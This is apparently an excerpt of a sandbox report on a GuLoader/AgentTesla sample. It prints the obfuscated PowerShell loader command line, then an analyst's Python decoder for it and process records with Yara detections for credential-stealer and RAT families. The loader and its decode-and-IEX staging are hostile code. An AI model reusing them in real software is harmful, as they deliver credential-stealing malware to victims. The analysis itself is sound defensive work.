Mi`$AnASkdfosElcMirPoiLapUntsuiZotCaiReuUnsMe2Di;St`$GaANedsmsAbcExrAeiMopSatTeiPutBoiViuNosRe3we Ta=Re TiHTaTStBEr 
Ac'CaEGrDjo9GiFSw9SkDAn8CuBNaEYa7Ex8InDCaAMoCOfAhyFMuABe0BrAEl7PrAMeCCh8prAInAAn6ReADh7RdBMiATaBCuDCaBNoBSuBFrCRaAScAGuBMiDmiABe6FrBCoBUnERa1BeEHuDTu9SkBChASeCpaAFoAHaAIn8MaAAu5koAsoALiAtr0ThBOpDStBSkBLaAEs8gaBAbDGaAfeCInFTsFBaEKr5NaEsp9Su9Af2Fo9PoATaBSt0SkBvlAKaBSkDRhAAaCReANo4MiECr7Pr9BrBPrAprCAnAQuFFrAFy5CyAKoCOmAOrADeBSmDAfAXy0DaAIn6InASe7HoEgu7Kr8SaADeAOv8HeAAf5crAMi5skAPj0meAKa7MaALiEKo8KlASdABi6BaAFi7DaBIdFClAPaCBoAEn7BiBbaDUtAFo0CoASe6FuABa7ArBNaARe9Ma4FuFLa3PuFSc3El9SiACeBUbDMoANo8UnADe7NoAKaDufAFi8LiBFeBHjASnDPrEGu5GuERu9EnEBrDCaBSyFsaAGa8SwBBaBMa9Us6TrBCo9LuARo8DeBNrBKaAOn8TrABa4CpACoCOuBAnDSiAUdCNoBQiBEvBTeAGeEOp0AnESt7lo9SeABeACrCFlBNrDTv8Ka0KuAox4WoBPl9SoAPi5EdAplCmyAPa4DuASiCToABl7InBBiDuhALe8SnBInDLiAEf0ToASy6reANu7Af8FiFPoAPr5StAEc8GsASlEceBcoAKoEWa1AgEFoDFe9KuBSdAPyCMeAStATkATr8LuAEx5SkAScAMaAUn0ErBFlDSlBIsBScATn8KnBNeDFeAKaCTaFByEDiELa0Ro'Fo;An&Sp(Sp`$SoDBieBomcoaAggFunpseUntBuiWrzFaamabAfludeer7Ov)Gl Di`$EvAAndSisUtcAnrSoiRapKotAciSttSpiApuNosRa3Sc;Te`$LaAApdChsUzcPhrSaiPrpButKaiGrtsaiIcuDrsLo4Bo Af=St SaHHiTChBDi Kr'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'En;En&Re(Fa`$SuDvieSpmSuaLygRenBleEntJoiCazInaPobpulAseTi7Ly)Re ga`$kaAModUdsBecstrTriFopHatBiiswtFliTiuEnsHa4Ga;Co`$SkAChdPisIncCorBiinepBatHaiVatteiinuErsTe5Fo Gi=uk FlHBeTHyBBo Fl'DyBFrBJaAStCLeBLaDReBSpCInBInBBoALo7RoEPt9TmEbaDBe9HiFAm9PeDTh8LaBViEOv7Pa8UdATrBOpBjiAtrCAfAKo8LeBReDDrAUnCCo9CoDChBTy0KiBMa9GaASiCFlESo1SkEOp0Go'ki;fl&Ca(Ba`$deDSaeStmWoaLugNunBreOrtDiiTrzLiaGebSilMyeKo7Pr)Ga Sp`$JiALidHasRocUnrBriUppGetFeiTitDiiAdustsSk5Co Ki Pn Tr;Sk}Bo`$enkSukUl Sc=Sk SpHSlTSaBLo Be'EnABa2MaALaCMiBPoBMoASu7SpAStCMoACo5BiFAlAFjFAbBKe'Fo;Pa`$ViASidPrssucHarBeiFopOptUniEktSmiOkuSpsub6sp Ti=li PrHCaTWhBHo 
St'unEAlDToBPrFEnAOp8ViBviBAn9So6RaBFlFElAMe8BaEAr9EfFSm4BaEMi9Bi9Am2Ub9slAUdBMa0MeBKiAInBLiDMeARoCSuAUn4pjESt7Dr9fiBUdBSqCReAPr7GrBInDCaATr0NaAby4FrAudCHyEDo7Mi8Fo0beAHo7ReBBoDCoAFjCInBDoBReAEl6BoBPe9Vi9SuAFoANoCXyBFnBBlBMeFveAfe0OuALeASlAdeCKaBTjAChEDa7Ha8No4KoAOp8HoBAlBGaBAlAfoASe1SkAPr8MiAZy5Ap9Dr4RuFKl3HjFRo3Cz8WiEkuAMeCSkBTwDRi8SpDDeAAgCPsAGa5ClABeCRiADeEIsAKa8LaBLiDSlAKnCPr8PoFPjANa6PrBStBCi8SmFBaBNaCSaAfr7InAAdASpBTvDApAKl0DoAIn6GeAHe7Na9Sp9NoAJo6FoABo0TrARa7KlBOlDTrASpCXiBFaBKiEin1SoEKn1brACaFDeAPh2UnBDa9CaEDe9ChESeDTaASt2SuAVa2AlEMa9TeEBeDCa8WaDOpATiCElASt4UnAaf8GsAApEMiAsk7EgAFiCSpBQuDFoAPr0SpBDe3HeATi8UsAOfBPaASa5ShAreCGlFSuDKoEOm0stERe5heEGl9chECa1Hy8NoEFo8AnDSl9SeDFeEEx9Sk8Ma9suESu1Pi9St2Sc8Fl0ReATo7FlBLbDRe9st9MiBArDdeBKrBBi9As4OrESt5AfESp9Ga9Ty2Kl9PrCPe8Ro0InANo7FrBAaDUvFArAMiFMoBSp9Ro4CoEPe5UdESe9Tr9Me2Sk9SlCru8Ek0BeAFi7FlBflDVeFHoASiFEmBOv9Ax4urEDu5PaEmu9Un9Om2Pr9LiCSk8Ar0SmALu7UnBCoDimFSpANoFCyBBr9Fl4MeEUn0MoEPa9LaEBe1Va9Pr2De8Re0CuASk7PrBEuDas9Sk9SgBGrDSkBWiBFo9Do4HaEIn0PuEAd0BaELa0Pr'Re;Su&At(Te`$AfDFueUdmSaaStgFrnBaeArtLaiStzSnaAgbFllHoeSv7To)In Sy`$UnAFadSlsLocudrUniPrpObtTiiGetUniCruZosRu6Pr;Fo`$ChvFoaefrKl_SmnRutUn Be=Ud VaftokAppSk Sk`$BrDPreGemDiaIngStnUneHotBaiHezKeaEmbaflbeeth5re Be`$OcDLaeFimRaaRugLanTeeKntPoiBezHraGabPolSjeSl6sa;Fo`$IdAMidVesTocInrMoiLapSwtPliEktOpiReuPasFr7Ba He=No PrHUpTPrBOr Ob'BeEMaDFu8Pe8seBNiBPrBFeDCyAKnCSeASyFCrADe8GeANe2syBPeDKiAFlCefBSeBFaFGuABiEAr9spFHu4DeESt9FiESsDFlBReFHaAre8ouBHuBPa9Di6BlBSeFUnAre8BiEHo7Fa8Ri0MeATi7miBDeFKoAKu6JaAst2teAInCTiEAn1An9Op2Ak8Hi0KlARe7AfBDeDLa9My9DoBStDReBPrBPr9Dy4reFTr3KaFEd3ri9Co3RiAViCKaBAsBHaAEk6OrEMi5UnEUd9tiFUkAMoFBlFTeFTrFToEKo5UnESa9RaFCe9NoBBo1RiFEsAGiFBr9BlFFo9TnFHa9MaEMa5PaEJa9GrFPe9FrBUn1trFLaDOvFKe9SkESv0Ov'Ap;In&Om(pa`$PeDSleWemcaacigPunLoeFatNeiDezHeaPabFrlWiebl7Ve)Ac Py`$MaARedPospicSkrM iTipTytObiamtoniSkuTesan7Pr;Su`$BiACodPrsBocKirusiIcpDetSliPetLyiteuPesEf8Un Po=Tr FrHphTNaBDy 
Ti'ErEGrDcoAAc6fjBKaBEnABe0UnERa9ChFSp4SmEFl9SuETeDCoBafFIcADu8BlBRaBFr9Sv6KlBFiFJuASi8FoEPa7Cl8Pe0MiAKo7raBVaFdiAMa6NaASp2ArASpCgaEbr1Ap9Re2At8Ku0CaASp7BlBKuDLa9Im9MaBBoDPhBGwBRe9em4caFSt3PoFov3br9st3VoAUnCJeBmaBEsAAc6CoECl5UnEOo9MiFBa9KeBDe1BuFHj8SmFSk9DeFUn9foFCa9HuFAl9KoFEn9EgESo5BaEDe9UnFTa9JaBCl1AkFPrATeFFi9TeFPi9NoFBu9opENs5BoELe9EuFBa9TaBEn1KrFToDTrELi0Ti'Sk;Pe&Ln(in`$PrDQueKemKraDrgOpnReeUntWhiblzKraUrbKllDaeAr7Os)Re La`$luAgldNosAncHorUniSopNitEpiCotFsiaruUlsHy8Ha;Bu`$FosBspCaiOvlafdTeenuvDdaAnnOpdJosDrpPerFloKojDheTekAptFleSerMy=By(chGFoeTatda-DoIOrtBeeBomUdPGrrsaoSppDiestrBetPhyCe An-DePSpaJatSlhSt Un'GaHAaKEfCStUPa:Ud\FlKOpyHaseahTaaViaManbodleearnSt\MidCouRemMepNoeCotDesSu'Vi)Br.SklBeaLoyPnldraJasca;Va`$KoAGedAdsStcInrIniSepGrtheiTitFuifeuRasSp9Sa De=Ch UnHLyTInBFl Ve'NaEGrDPr8Gr8ReACyDGaBCaAAcAUnAFoBStBPrAkl0AlBBa9CaBImDPaARe0NuBKoDPaAOt0UnBToCPrBAbASeEEn9riFCl4EmEbl9Fo9Ne2De9TrASkBSt0TaBbiAChBCoDSpAMeCIdAAn4PhEBe7Dd8TeAPaALo6SpAGr7ReBHiFCaALeCSeBDeBSkBGoDBe9Li4EmFHy3rgFUn3Ar8VeFNoBFiBenAin6DiAAa4Br8UnBFiApi8YvBAfABaAHeCSuFGrFFaFBaDin9VaAUnBCoDToBOvBInALa0LrAAc7mbATrEStECo1SaEMaDBlBUdAFaBBe9CoASk0NeABa5anANaDCaALeCJeBIdFAkATi8YdATa7DeAbaDUnBFoAEpBMi9ChBTrBSvACa6SvAPh3AgASyCJoAre2RuBvaDMiAUnCKeBInBJoESt0co'Co;Sa&Re(Fo`$ImDbeeUdmSaaOugUdnMyeDetSaiDizLiaMebGelKoeOv7In)Le Su`$CaABedcrsFrcBaririSypDitLaiKetAdiAnuEpsSi9Am;De`$TesAgpreiOplisdCheKlvLeaDenLadkosprpInrFdouljSkebukMatsheRurNo0St Sp=Ge JoHToTDeBMo Re'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'Er;Ma&Af(Ly`$scDCoeFrmGaaThgChnTreTjtPyiDizImaEpbTilSaeTa7Um)Ra Ta`$PosLapUniAnlEcdtreTrvdeaPonSadSasnypCorBooRejFoeSakVotdieSvrSn0Li;ph`$FasTyiSpzvaePa=Ha`$GeAOvdbrsEqcAprstiPapQutHuiLitSyiUnuWrsPa.AncInoBeutenUntAv-Ou3Di6Si6Ty;Af`$BesMepMyiSylSadJdePevMeaAsnSydSpsSlpPirGroEwjHyeSukEntNeeRhrSa1Kr Le=ne HyHHaTInBSa 
Un'No9Pe2St9FlAGeBIm0PuBStAbeBBeDTrACoCTrASe4ReESa7Sa9SpBmoBGlCEfASa7TfBDuDKoAAf0miASc4TiAofCMoEOr7Pa8Ig0NoALe7FiBTuDDeAJaCBoBChBMaAFi6GrBPr9Ch9SwAJeAImCHaBSaBOrBGrFFoAPr0KnASiAPrAHaCudBGeAVeEEl7Ed8Cl4biAFr8NeBOdBRaBDeAGlACr1TrAGa8PsAPa5Gi9Ze4NoFBl3auFFo3Mo8KiAorAAf6NeBKr9TaBDy0TiEUd1DiENiDbr8Ga8KaAPaDBhBEnASkATyABgBVeBuoAAb0AbBDo9FoBSyDDiARe0BaBBoDWaAst0VuBSuCTaBTyAImEFo5skEFl9FeFPlAWiFInFklFKrFViENe5VaEsv9HoESuDEvASp6tiBMiBKaAKl0BaEBa5kvERi9SmESvDStBHaAChABa0CoBFl3SyACoCRmEPs0Ir'vi;No&Re(Di`$PaDUdeRamPraAvgpenAneAmtSyiSezSoaSvbSalfieDe7Ov)Sm Ko`$MusBrpDyijulDedMieovvJoaCanPhdAtsOrpFrrPaoFojNoePrkBotSoeKarHe1Bv;Ca`$AgsRopGriJulPodBreAfvRoaUdnSydChsStpFerAnoCijWeeStkAntWieRerTo2Un Ro=Sa MoHVeTFoBan la'inESaDPlBPjFMoARa8MiBUgBno9Fl6guBTjBOpBAmCAnACy7PeASy4PuAShCOpETi9CeFCo4ExEDe9Fa9Un2un9ToAPaBTe0LiBEmASaBcrDPrACuCSoAFo4HoEPo7Re9PeBzyBBoCJeAka7HoBPrDJuAAn0CuAdi4PaAgeCraEwo7Di8Fa0ReASe7StBAnDOvAGlCAfBInBObAor6UnBLy9No9KaASaAOpCDiBInBAbBTrFToATy0BeAspAFlAArCskBInAWiEBr7Ba8Yd4YaABu8UdBSkBVaBfoATeAHo1AbAFo8FaAMa5Jo9Wh4WeFMi3heFFo3Re8CrESkAInCRaBHoDGr8TaDAnAViCkrAPr5ReAEfCFiATaEAlAAp8beBprDChAHaCPe8klFUdALi6GeBStBFo8gaFSuBShCafALr7AtATrASlBBaDHaAAn0SoAbr6TyAFl7Uk9Fr9FoABr6BuAPr0PoAHe7doBDoDanAMoCCrBAfBPaECh1PaEapDPr8gr8HjBDvBAaBLoDSuASkCSfAFlFHiASv8DiADd2inBSuDMaASeCCeBhuBYdFFiAunEBr5StEVe9CiENe1Ud8PhESa8InDOr9NaDBaELi9Ko8An9UnEIn1Ka9Ce2Re8Pl0ErACr7OmBSmDhy9No9HeBIdDCoBBeBUn9Ca4veELe5Or9Ps2Be8St0CaAMa7TjBUpDBl9Ud9KaBMyDLuBArBRe9do4SyEBi0SeEGr9FrEAn1Pr9Op2Un9CiFPoAEx6MoALa0VaAVeDSp9Ch4ChEWh0ArEVa0BeEAn0En'Di;In&Ma(Li`$GeDCheEumOuaHvgLonNueUatFuiMizfjaKrbEtlOeeIn7Fo)In Ma`$FosDepGoiLalUndMieAmvWhaImnTydGesFipAnrDaoMojJaeUskOmtFaeHorso2Fi;Ou`$AnsNypOviSplTadKoeBlvReaInnSadSisOppAlrbrochjHoeStkSttmoeBerre3Pr Cu=Sa PhHFuTsiBpa 
Vo'ovEBiDHyBPuFwiASt8PeBkuBIn9Bo6VeBStBUnBKvCDiAUn7NaAGa4KoAFiCveEFa7Tr8Sm0UdAFl7HaBDeFHeATa6HyARa2EnASkCSaEEx1AdERoDMaADd6InBOpBSaANo0InEBr5TaEAdDInBHaFHaADi8AfBBaBce9No6RuASa7BuBUnDMoESu0Mu'Tr;Sw&Go(Se`$ReDHaeBemRoaPrgHenRoeSythuiLezPlaPabPjlHaeAa7No)Un ne`$ResStpHeiFulRedOteBrvHuaGonDedFesStpKvrIboDijSteFikFntReePlrSm3Ni#Bl;""";;Function spildevandsprojekter9 { param([String]$HS); For($i=2; $i -lt $HS.Length-1; $i+=(2+1)){ $Brndoffers = $Brndoffers + $HS.Substring($i, 1); } $Brndoffers;}$Chlorpikrin0 = spildevandsprojekter9 'AgIPaEBeXBa ';$Chlorpikrin2 = spildevandsprojekter9 'CosLatHuaCerRytRe-RejAfoYvbRi ';$Chlorpikrin1= spildevandsprojekter9 $Damspils;;if([IntPtr]::size -eq 8){.$env:windir\S*64\W*Power*\v1.0\*ll.exe $Chlorpikrin1 ;}else{&$Chlorpikrin0 $Chlorpikrin1;};;;
                        Imagebase:0x6a0000
                        File size:433152 bytes
                        MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:.Net C# or VB.NET
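
The decoder that the sample carries at the end of this command line (Function spildevandsprojekter9) keeps every third character of its argument, starting at index 2 and stopping before the last character. At run time the two short literals decode to IEX and start-job, and the large $Damspils blob decodes to the second-stage script, which is then handed to a 32-bit PowerShell located through the wildcard path $env:windir\S*64\W*Power*\v1.0\*ll.exe when [IntPtr]::size is 8 (64-bit host), or IEX'd directly otherwise. The Python below is an added analyst helper, not code from the Joe Sandbox report or from the sample: it re-implements that loop, recovers the two literals and an excerpt of the blob copied from the command line above, and expands the wildcard launcher path against a constructed directory listing that stands in for a real Windows file system. One assumption is labelled in the code: the backticks in the blob are the enclosing double-quoted string's escapes of $ and are stripped before decoding, because the three-character alignment only holds once they are removed.

```python
"""Analyst helper for the obfuscated PowerShell command line in this report.

Added example, not code from the Joe Sandbox report or from the sample.  It
mirrors the sample's own decoder, the PowerShell function spildevandsprojekter9:
    For($i=2; $i -lt $HS.Length-1; $i+=(2+1)) { $out += $HS.Substring($i, 1) }
"""
import fnmatch
import re


def decode_stride3(s: str) -> str:
    """Exact equivalent of spildevandsprojekter9: characters at index 2, 5, 8, ...
    while the index is < len(s)-1, so the trailing pad character is dropped."""
    return s[2:len(s) - 1:3]


def strip_outer_escapes(s: str) -> str:
    """ASSUMPTION (from the observed alignment): the $Damspils blob sits inside a
    double-quoted PowerShell string, so every '$' is written '`$'.  The backtick is
    consumed by the outer parser and is not part of the three-character stride;
    leaving it in shifts the alignment and produces garbage."""
    return s.replace("`$", "$")


# Tail of the command line, copied from the report (the part after the blob).
CMDLINE_TAIL = (
    "$Chlorpikrin0 = spildevandsprojekter9 'AgIPaEBeXBa ';"
    "$Chlorpikrin2 = spildevandsprojekter9 'CosLatHuaCerRytRe-RejAfoYvbRi ';"
    "$Chlorpikrin1= spildevandsprojekter9 $Damspils;;"
    "if([IntPtr]::size -eq 8){.$env:windir\\S*64\\W*Power*\\v1.0\\*ll.exe $Chlorpikrin1 ;}"
    "else{&$Chlorpikrin0 $Chlorpikrin1;}"
)

# Excerpt of the $Damspils blob, copied from the report; it starts on a
# three-character boundary of the blob so the stride lines up.
BLOB_EXCERPT = (
    "Ir'vi;No&Re(Di`$PaDUdeRamPraAvgpenAneAmtSyiSezSoaSvbSalfieDe7Ov)Sm Ko`$Mus"
    "BrpDyijulDedMieovvJoaCanPhdAtsOrpFrrPaoFojNoePrkBotSoeKarHe1Bv;Ca`$AgsRop"
    "GriJulPodBreAfvRoaUdnSydChsStpFerAnoCijWeeStkAntWieRerTo2Un Ro=Sa MoHVeTFo"
    "Ban la'in"
)

CALL_RE = re.compile(r"spildevandsprojekter9\s+'([^']*)'")


def decode_literals(cmdline: str) -> list:
    """Every quoted literal passed to the decoder, paired with its plaintext."""
    return [(enc, decode_stride3(enc)) for enc in CALL_RE.findall(cmdline)]


def decode_blob(blob: str) -> str:
    """Decode a $Damspils fragment: drop the outer-string escapes, then stride."""
    return decode_stride3(strip_outer_escapes(blob))


# Constructed directory tree of a stock 64-bit Windows (offline stand-in for the
# real file system), used only to show what the launcher wildcard resolves to.
FAKE_FS = {
    "C:\\Windows": ["System32", "SysWOW64", "Microsoft.NET", "Temp"],
    "C:\\Windows\\System32": ["WindowsPowerShell", "conhost.exe"],
    "C:\\Windows\\System32\\WindowsPowerShell": ["v1.0"],
    "C:\\Windows\\System32\\WindowsPowerShell\\v1.0": ["powershell.exe", "powershell_ise.exe"],
    "C:\\Windows\\SysWOW64": ["WindowsPowerShell", "cmd.exe"],
    "C:\\Windows\\SysWOW64\\WindowsPowerShell": ["v1.0"],
    "C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0": ["powershell.exe", "powershell_ise.exe"],
}


def resolve_wildcard_path(pattern: str, fs=FAKE_FS, windir="C:\\Windows") -> list:
    """Expand a wildcard command path one case-insensitive segment at a time, the
    way PowerShell's command lookup does for '. <glob>' / '& <glob>'."""
    pattern = pattern.replace("$env:windir", windir)
    if not pattern.startswith(windir + "\\"):
        return []
    candidates = [windir]
    for seg in pattern[len(windir) + 1:].split("\\"):
        candidates = [
            base + "\\" + name
            for base in candidates
            for name in fs.get(base, [])
            if fnmatch.fnmatchcase(name.lower(), seg.lower())
        ]
    return candidates


WILDCARD_RE = re.compile(r"\.(\$env:windir\\\S+)")


def launcher_path(cmdline: str) -> list:
    """The concrete executable the '.$env:windir\\...' launcher expands to."""
    m = WILDCARD_RE.search(cmdline)
    return resolve_wildcard_path(m.group(1)) if m else []


if __name__ == "__main__":
    for enc, dec in decode_literals(CMDLINE_TAIL):
        print(f"{enc!r} -> {dec!r}")
    print(decode_blob(BLOB_EXCERPT))
    print(launcher_path(CMDLINE_TAIL))
```

Running the file prints IEX and start-job for the two literals, the decoded excerpt ';&($Demagnetizable7) $spildevandsprojekter1;$spildevandsprojekter2 = HTB ' (a call through a function name held in a variable, followed by the next hex-looking blob handed to HTB), and the resolved launcher path C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, which is consistent with the Yara matches landing in the 32-bit CasPol.exe (Target 13, Wow64 process: true) rather than the 64-bit one. Any blob excerpt must start on a three-character boundary; for the full string, decode from its opening quote.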

                        Target ID:11
                        Start time:20:45:43
                        Start date:28/11/2022
                        Path:C:\Windows\System32\conhost.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Imagebase:0x7ff773f10000
                        File size:875008 bytes
                        MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language

                        Target ID:12
                        Start time:20:46:47
                        Start date:28/11/2022
                        Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\caspol.exe
                        Imagebase:0x210000
                        File size:108664 bytes
                        MD5 hash:914F728C04D3EDDD5FBA59420E74E56B
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language

                        Target ID:13
                        Start time:20:46:48
                        Start date:28/11/2022
                        Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                        Wow64 process (32bit):true
                        Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\caspol.exe
                        Imagebase:0x9f0000
                        File size:108664 bytes
                        MD5 hash:914F728C04D3EDDD5FBA59420E74E56B
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:.Net C# or VB.NET
                        Yara matches:
                        • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 0000000D.00000000.3773940652.0000000000E00000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000D.00000002.7460473014.000000001D6D1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000D.00000002.7460473014.000000001D6D1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 0000000D.00000002.7460473014.000000001D6D1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security

                        No disassembly